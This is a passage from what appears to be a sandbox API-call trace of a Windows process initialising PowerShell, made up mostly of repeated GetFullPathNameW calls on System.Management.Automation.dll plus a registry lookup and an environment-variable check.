lpBuffer=0x1f7410, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf [0086.446] CoTaskMemFree (pv=0x1f7410) [0086.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.448] GetCurrentProcessId () returned 0xb08 [0086.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.451] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed798 | out: phkResult=0xed798*=0x390) returned 0x0 [0086.452] RegQueryValueExW (in: hKey=0x390, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed71c, lpData=0x0, lpcbData=0xed718*=0x0 | out: lpType=0xed71c*=0x1, lpData=0x0, lpcbData=0xed718*=0x56) returned 0x0 [0086.452] CoTaskMemAlloc (cb=0x5a) returned 0x1b283300 [0086.452] RegQueryValueExW (in: hKey=0x390, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed6ec, lpData=0x1b283300, lpcbData=0xed6e8*=0x56 | out: lpType=0xed6ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed6e8*=0x56) returned 0x0 [0086.452] CoTaskMemFree (pv=0x1b283300) [0086.452] RegCloseKey (hKey=0x390) returned 0x0 [0086.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.462] CoTaskMemAlloc (cb=0x104) returned 0x1f7410 [0086.462] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7410, nSize=0x80 | out: lpBuffer="") returned 0x0 [0086.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.468] GetFullPathNameW (in: 